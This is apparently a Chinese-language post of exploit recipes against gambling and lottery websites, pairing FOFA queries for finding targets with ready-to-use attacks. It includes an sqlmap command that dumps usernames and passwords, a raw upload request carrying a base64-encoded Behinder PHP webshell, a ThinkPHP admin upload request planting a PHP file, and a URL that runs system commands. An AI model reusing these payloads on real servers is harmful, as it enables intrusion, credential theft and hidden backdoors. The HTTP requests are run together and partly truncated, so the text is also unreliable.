菠菜

某棋牌SQL注入

fofa:"/Content/images/login_main.png"

登陆处存在POST注入，抓包sqlmap，获取用户名和密码：

sqlmap -r qp.txt -D RYPlatformManagerDB -T Base_Users -C Username,Password --random-agent --batch –-dump

某菠菜 任意文件上传漏洞（0day）

fofa: body="main.e5ee9b2df05fc2d310734b11cc8c911e.css"

上传冰蝎马，返回上传路径

POST //statics/admin/webuploader/0.1.5/server/preview.php HTTP/2Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1If-Modified-Since: Mon, 05 Sep 2022 01:19:50 GMTIf-None-Match: "63154eb6-273"Te: trailersContent-Type: application/x-www-form-urlencodedContent-Length: 746data:image/php;base64,PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pg==

某彩票RCE

fofa: fid="xKNWTGrIkLW2BoNIbYtpjw=="

tp5 rce/后台上传

POST /admin/operation/upload_one.html HTTP/1.1Host: localhostContent-Length: 306sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="100"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36sec-ch-ua-platform: "Windows"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGfVQlxBpL1CT8DeAccept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/admin/operation/service_edit/id/7.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=s2g8ah08l84g88htqrnkt6sdibConnection: close------WebKitFormBoundaryUGfVQlxBpL1CT8DeContent-Disposition: form-data; name="name"web.php------WebKitFormBoundaryUGfVQlxBpL1CT8DeContent-Disposition: form-data; name="file"; filename="web.php"Content-Type: image/jpeg------WebKitFormBoundaryUGfVQlxBpL1CT8De—

某彩票 任意代码执行漏洞

fofa：newindex/static/js/16070610231968312.js

执行whoami命令的POC，返回用户名

http://{{Hostname}}/lib/classes/googleChart/markers/GoogleChartMapMarker.php?google88990=system(whoami);